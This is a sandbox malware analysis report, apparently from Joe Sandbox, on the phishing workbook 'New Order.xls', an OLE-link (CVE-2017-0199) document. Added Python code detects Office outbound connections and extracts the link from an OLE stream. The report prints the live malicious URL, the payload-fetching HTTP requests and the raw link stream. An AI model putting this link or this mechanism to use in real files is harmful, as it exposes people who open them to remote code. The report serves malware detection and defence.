
Windows Analysis Report
New Order.xls

Overview

General Information

Sample name:New Order.xls
Analysis ID:1632079
MD5:c7872daffc3e3ebb82767d76b666b84a
SHA1:216df5633d5e9cbbf7adc26d5207fd801857b3f3
SHA256:63a1fe8ac5a716954156b21911bfeecb3438933c6a981f8828173adc2bf7ca89
Tags: CVE-2017-0199, xls, user-abuse_ch

Detection

Score:64
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
AI detected landing page (webpage, office document or email)
Excel sheet contains many unusual embedded objects
Detected non-DNS traffic on DNS port
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

  • System is w11x64_office
  • EXCEL.EXE (PID: 2392 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
    • splwow64.exe (PID: 4248 cmdline: C:\Windows\splwow64.exe 12288 MD5: 4C1F48431A4C5DE7841216C32CD98C46)
  • EXCEL.EXE (PID: 2756 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\New Order.xls" MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
No configs have been found
No yara matches

System Summary

Source: Network Connection; Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0', Tim Shelton; Data: DestinationIp: 104.26.1.139, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 2392, Protocol: tcp, SourceIp: 192.168.2.27, SourceIsIpv6: false, SourcePort: 49384
Source: Network Connection; Author: X__Junior (Nextron Systems); Data: DestinationIp: 192.168.2.27, DestinationIsIpv6: false, DestinationPort: 49384, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 2392, Protocol: tcp, SourceIp: 104.26.1.139, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched
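The two Sigma hits above both key on the same Sysmon EventID 3 fact: an Office host process (here EXCEL.EXE, PID 2392) initiating a TCP connection to a non-local address. The following is an added example, written for this page and not the Sigma rules' own text, of that detection logic run over constructed Sysmon-style records. Note that the second hit in the report lists 104.26.1.139:443 as SourceIp/SourcePort and the analysis VM as the destination while still marked Initiated: true; a rule that matches only on DestinationIp would miss that record, so the example chooses the remote endpoint as whichever side is globally routable and de-duplicates per (process, peer). The list of Office image names, the sample events and the alert format are assumptions of the example.

```python
import ipaddress

# Office host processes whose outbound connections the rule is interested in
# (assumed list for this example; tune to your environment).
OFFICE_IMAGES = {
    "excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe",
    "msaccess.exe", "mspub.exe", "visio.exe", "onenote.exe",
}

# Constructed Sysmon EventID 3 (network connection) records.  The first two
# mirror the report's Sigma hits, including the swapped endpoints of the
# second one; the rest are benign controls.
SAMPLE_EVENTS = [
    {"EventID": 3, "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "ProcessId": 2392, "Initiated": True, "Protocol": "tcp",
     "SourceIp": "192.168.2.27", "SourcePort": 49384,
     "DestinationIp": "104.26.1.139", "DestinationPort": 443},
    {"EventID": 3, "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "ProcessId": 2392, "Initiated": True, "Protocol": "tcp",
     "SourceIp": "104.26.1.139", "SourcePort": 443,
     "DestinationIp": "192.168.2.27", "DestinationPort": 49384},
    {"EventID": 3, "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "ProcessId": 2392, "Initiated": True, "Protocol": "tcp",
     "SourceIp": "192.168.2.27", "SourcePort": 49400,
     "DestinationIp": "192.168.2.5", "DestinationPort": 445},      # LAN share, benign
    {"EventID": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "ProcessId": 5100, "Initiated": True, "Protocol": "tcp",
     "SourceIp": "192.168.2.27", "SourcePort": 49401,
     "DestinationIp": "104.26.1.139", "DestinationPort": 443},     # browser, not Office
    {"EventID": 1, "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "ProcessId": 2756},                                          # not a network event
]


def remote_endpoint(event):
    """Return (ip, port) of the non-local peer, or None if both ends are local.

    Sysmon puts the peer in DestinationIp when Initiated is true, but exported
    records (as in the report's second hit) can carry the two ends swapped, so
    choose whichever side is a globally routable address."""
    src = ipaddress.ip_address(event["SourceIp"])
    dst = ipaddress.ip_address(event["DestinationIp"])
    if dst.is_global:
        return event["DestinationIp"], int(event["DestinationPort"])
    if src.is_global:
        return event["SourceIp"], int(event["SourcePort"])
    return None


def is_office_image(image):
    """Match on the basename only; the install root varies (Office16, root\\Office16, ...)."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower() in OFFICE_IMAGES


def detect_office_outbound(events):
    """Alert once per (process, remote endpoint) for Office-initiated connections
    to non-private addresses.  Returns a list of alert dicts."""
    seen = set()
    alerts = []
    for ev in events:
        if ev.get("EventID") != 3 or not ev.get("Initiated"):
            continue
        if not is_office_image(ev.get("Image", "")):
            continue
        peer = remote_endpoint(ev)
        if peer is None:
            continue
        key = (ev["ProcessId"], peer)
        if key in seen:          # the swapped duplicate collapses onto the first hit
            continue
        seen.add(key)
        alerts.append({"rule": "Office Application Outbound Connection",
                       "pid": ev["ProcessId"], "image": ev["Image"],
                       "remote_ip": peer[0], "remote_port": peer[1],
                       "protocol": ev.get("Protocol", "")})
    return alerts


if __name__ == "__main__":
    for alert in detect_office_outbound(SAMPLE_EVENTS):
        print(alert)
```

Run against the sample records this yields a single alert for PID 2392 to 104.26.1.139:443; the LAN share, the browser and the non-network event are ignored. The private-address filter is a deliberate narrowing relative to a rule that alerts on every Excel connection: it trades coverage of internal staging hosts for far fewer alerts from file servers and proxies, so keep an allowlist rather than the filter if your Office clients reach the internet only through an internal proxy.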


AV Detection

Source: New Order.xls; Avira: detected
Source: New Order.xls; Virustotal: Detection: 40%
Source: New Order.xls; ReversingLabs: Detection: 31%

Phishing

Source: Screenshot id: 10; Joe Sandbox AI: Screenshot id: 10 contains QR code
Source: Screenshot id: 9; Joe Sandbox AI: Screenshot id: 9 contains QR code
Source: global traffic; DNS query: name: link.orai.io
Source: global traffic; DNS query: name: st3.pro
Source: global traffic; DNS query: name: otelrules.svc.static.microsoft
Source: global traffic; TCP traffic (the report lists one entry per packet; collapsed here to flows, each of which was seen in both directions):
  192.168.2.27:49372 <-> 1.1.1.1:53
  192.168.2.27:49384 <-> 104.26.1.139:443
  192.168.2.27:49385 <-> 5.161.200.29:443
  192.168.2.27:49386 <-> 5.161.200.29:443
  192.168.2.27:49387 <-> 13.107.246.60:443
  192.168.2.27:49388 <-> 13.107.246.60:443
Source: Joe Sandbox View; IP Address: 104.26.1.139
Source: Joe Sandbox View; IP Address: 5.161.200.29
Source: Joe Sandbox View; IP Address: 13.107.246.60
Source: Joe Sandbox View; JA3 fingerprint: 258a5a1e95b8a911872bae9081526644
Source: global traffic; HTTP traffic detected:
  GET /nBuIRQ?&mix=gaudy&role=yummy&will=flawless&technician HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Host: link.orai.io
  Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
  GET /NukfDlP HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Connection: Keep-Alive
  Host: st3.pro
Source: global traffic; HTTP traffic detected:
  GET /404 HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Connection: Keep-Alive
  Host: st3.pro
Source: unknown; TCP traffic detected without corresponding DNS query: 1.1.1.1 (4 entries)
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (3 entries)
Note: 1.1.1.1 is the only port-53 peer in the capture and the three DNS queries in this report did resolve, so this traffic is consistent with the analysis VM using 1.1.1.1 as its resolver (DNS over UDP plus DNS over TCP) rather than with a separate channel; treat the "non-DNS traffic on DNS port" signature as low weight unless the TCP payload is inspected.
Source: global traffic; HTTP traffic detected (Office telemetry rule download, sent with Office's own User-Agent rather than the IE-style Trident one used for the link above):
  GET /rules/rule170146v0s19.xml HTTP/1.1
  Connection: Keep-Alive
  Accept-Encoding: gzip
  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)
  Host: otelrules.svc.static.microsoft
Source: global traffic; HTTP traffic detected:
  GET /rules/rule120201v19s19.xml HTTP/1.1
  Connection: Keep-Alive
  Accept-Encoding: gzip
  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)
  Host: otelrules.svc.static.microsoft
Source: global traffic; DNS traffic detected: DNS query: link.orai.io
Source: global traffic; DNS traffic detected: DNS query: st3.pro
Source: global traffic; DNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Content-Type: text/html; charset=utf-8
  Date: Fri, 07 Mar 2025 18:26:37 GMT
  Etag: "1225-4lR+8o8+z0M1Iq6OMuNgxAtPjT8"
  Strict-Transport-Security: max-age=15552000; includeSubDomains
  Vary: Accept-Encoding
  X-Content-Type-Options: nosniff
  X-Dns-Prefetch-Control: off
  X-Download-Options: noopen
  X-Frame-Options: SAMEORIGIN
  X-Powered-By: Next.js
  X-Xss-Protection: 1; mode=block
  Connection: close
  Transfer-Encoding: chunked
Source: New Order.xls, A0040000.0.dr; String found in binary or memory: https://link.orai.io/nBuIRQ?&mix=gaudy&role=yummy&will=flawless&technician
Source: Primary1741371936281475100_BC481253-AEBA-4B45-B8D1-BF1DB4DD15B5.log.0.dr; String found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.40/flatfontassets.pkg
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49388
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49387
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49386
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49385
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49384
Source: unknown; Network traffic detected: HTTP traffic on port 49387 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49386 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49388 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49384 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49385 -> 443
Source: unknown; HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.27:49388 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.27:49387 version: TLS 1.2

System Summary

Source: New Order.xls; OLE: Microsoft Excel 2007+
Source: ~DF88353551C6CABD09.TMP.0.dr; OLE: Microsoft Excel 2007+
Source: A0040000.0.dr; OLE: Microsoft Excel 2007+
Source: New Order.xls; OLE indicator, VBA macros: true
Source: New Order.xls and A0040000.0.dr (identical content in both); Stream path 'MBD0022EEA8/\x1Ole': https://link.orai.io/nBuIRQ?&mix=gaudy&role=yummy&will=flawless&technician8D}@DuP"=iq~U&k9#AtiK=b+6gjvy"w)!B"fvz!N[!~bS^SP&.Fq&*MT[SzRsO2I5enSGXysPcAHE7liJrLtGDvqy9oLo6KBsx8H8G6ivtT9y0kBfkwKXfUMeRG1rPdEcNGnqm4WEM02fus6mZZPBpIXwM9cnNDzYoF9pbr1tb7Jlw2ZkY5FsqKDkKF7bAmGgyyMmHpBDd4LpJiCPaPgFjNhgAF4X5OJW0F4WMrTxEz7YFah14HJGeQRoBl0oHaXROks4XDYgRuOvxvEpwGU0isD9QJ3x4EdES4yTRSHgynv-NU&:'A3hRl2ue?
Source: ~DF88353551C6CABD09.TMP.0.dr; OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
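The stream listed above (shown by the sandbox as 'MBD0022EEA8/\x1Ole', i.e. the '\x01Ole' stream of an embedded object storage) is where a linked OLE object keeps its source moniker; when Excel opens the workbook it resolves that URL moniker and fetches the target, which is the GET to link.orai.io made by EXCEL.EXE with the IE-style Trident User-Agent seen in the networking section, and is the behaviour the CVE-2017-0199 tag refers to. The following is an added example, written for this page and not the report's or any tool's own code, of recovering the link target from such a stream structurally rather than by string search. Its input is a constructed byte blob laid out like that stream (an OLEStream header followed by an absolute-source URLMoniker, per MS-OLEDS) with an ASCII copy of the link appended that runs straight into other bytes, reproducing the way the stream dump above shows the URL continuing into non-URL data. The structured parser is bounded by the moniker's Length field and returns the exact URL; the text-carving fallback over-runs by two characters on the constructed trailer. The optional extract_from_ole_file helper, which walks a real container with the third-party olefile package, is an assumption of this example and is not exercised by the sample data.

```python
import re
import struct

# CLSID_StdURLMoniker {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B} in its on-disk
# (little-endian Data1/Data2/Data3) byte order.
URL_MONIKER_CLSID = bytes.fromhex("E0C9EA79F9BACE118C8200AA004BA90B")

# Characters RFC 3986 allows unencoded in a URI; used to stop text carving.
_URI_CHARS = rb"A-Za-z0-9\-._~:/?#\[\]@!$&'()*+,;=%"
ASCII_URL_RE = re.compile(rb"https?://[" + _URI_CHARS + rb"]+")
UTF16_URL_RE = re.compile(
    rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[" + _URI_CHARS + rb"]\x00)+")

# The link target the report extracted from the sample's \x01Ole stream.
SAMPLE_URL = "https://link.orai.io/nBuIRQ?&mix=gaudy&role=yummy&will=flawless&technician"


def build_sample_ole_stream(url=SAMPLE_URL):
    """Construct a stand-in for a \\x01Ole stream (layout per MS-OLEDS OLEStream):
    Version, Flags (1 = linked object), LinkUpdateOption, Reserved1,
    ReservedMonikerStreamSize=0, RelativeSourceMonikerStreamSize=0, then an
    AbsoluteSourceMoniker holding a URLMoniker.  A trailing ASCII copy of the
    URL followed by non-URL bytes mimics the report's stream dump.  Constructed
    data for this example only."""
    url_utf16 = url.encode("utf-16-le") + b"\x00\x00"
    moniker = URL_MONIKER_CLSID + struct.pack("<I", len(url_utf16)) + url_utf16
    header = struct.pack("<IIIII", 0x02000001, 0x00000001, 0, 0, 0)
    body = struct.pack("<I", 0) + struct.pack("<I", len(moniker)) + moniker
    trailer = url.encode() + b'8D}@DuP"=iq~U&k9#AtiK=b+6gjvy'
    return header + body + trailer


def parse_url_monikers(blob):
    """Return every URL held in a serialised URLMoniker (MS-OLEDS 2.2.5):
    CLSID, 4-byte Length, NUL-terminated UTF-16LE URL, optional trailing fields.
    The Length field, not a delimiter scan, bounds the data, so bytes after
    the moniker cannot leak into the result."""
    urls = []
    pos = blob.find(URL_MONIKER_CLSID)
    while pos >= 0:
        start = pos + len(URL_MONIKER_CLSID)
        if start + 4 > len(blob):
            break
        (length,) = struct.unpack_from("<I", blob, start)
        data = blob[start + 4 : start + 4 + length]
        text = data.decode("utf-16-le", errors="replace")
        urls.append(text.split("\x00", 1)[0])
        pos = blob.find(URL_MONIKER_CLSID, start + 4 + length)
    return urls


def carve_urls(blob):
    """Text-carving fallback for streams whose moniker is damaged or packed.
    Candidates may over-run into adjacent bytes that happen to be URI-legal,
    so treat the tail of each result as untrusted."""
    found = [m.group(0).decode("ascii") for m in ASCII_URL_RE.finditer(blob)]
    found += [m.group(0).decode("utf-16-le") for m in UTF16_URL_RE.finditer(blob)]
    return found


def extract_from_ole_file(path):
    """Walk a real OLE2 container (optional third-party 'olefile' package) and
    run both extractors over every '\\x01Ole' stream.  Assumed helper; the
    constructed sample above does not need it."""
    import olefile  # optional dependency, imported lazily on purpose
    results = {}
    ole = olefile.OleFileIO(path)
    try:
        for entry in ole.listdir(streams=True, storages=False):
            if entry[-1] == "\x01Ole":
                data = ole.openstream(entry).read()
                results["/".join(entry)] = {"monikers": parse_url_monikers(data),
                                            "carved": carve_urls(data)}
    finally:
        ole.close()
    return results


if __name__ == "__main__":
    blob = build_sample_ole_stream()
    print("moniker:", parse_url_monikers(blob))
    print("carved: ", carve_urls(blob))
```

Run the structured extractor first and fall back to carving only when no URL moniker is present; on the constructed blob the carved ASCII candidate ends in "technician8D" because the bytes after the link happen to be URI-legal, which is exactly the ambiguity the report's own stream dump shows and the Length-bounded parse avoids.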
Source: classification engine; Classification label: mal64.winXLS@4/14@3/3
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; File created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; File created: C:\Users\user\Desktop\A0040000
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\{BC481253-AEBA-4B45-B8D1-BF1DB4DD15B5} - OProcSessId.dat
Source: New Order.xls; OLE indicator, Workbook stream: true
Source: A0040000.0.dr; OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; File read: C:\Users\desktop.ini
Source: unknown; Process created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknown; Process created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\New Order.xls"
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; Directory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
Source: New Order.xls; Static file information: File size 1231360 > 1048576
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; File opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dll
Source: ~DF88353551C6CABD09.TMP.0.dr; Initial sample: OLE indicators vbamacros = False
Source: New Order.xls; Initial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: New Order.xls; Stream path 'MBD0022EEA7/Package' entropy: 7.99272020732 (max. 8.0)
Source: New Order.xls; Stream path 'Workbook' entropy: 7.998238688 (max. 8.0)
Source: ~DF88353551C6CABD09.TMP.0.dr; Stream path 'Package' entropy: 7.99528162573 (max. 8.0)
Source: A0040000.0.dr; Stream path 'MBD0022EEA7/Package' entropy: 7.99528162573 (max. 8.0)
Source: A0040000.0.dr; Stream path 'Workbook' entropy: 7.99816642463 (max. 8.0)
Source: C:\Windows\splwow64.exe; Window / User API: threadDelayed 780
Source: C:\Windows\splwow64.exe; Last function: Thread delayed
Source: C:\Windows\splwow64.exe; Thread delayed: delay time: 120000
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE; Process information queried: ProcessInformation
ATT&CK matrix (one tactic per line; the number before a technique is the count shown on the page for that technique):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: 3 Exploitation for Client Execution; Scheduled Task/Job; At; Cron; Launchd
Persistence: 1 Browser Extensions; 1 Scripting; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: 1 Process Injection; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion: 3 Masquerading; 1 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Obfuscated Files or Information; Software Packing
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: 1 Process Discovery; 1 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 1 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
This section contains all screenshots as thumbnails, including those not shown in the slideshow.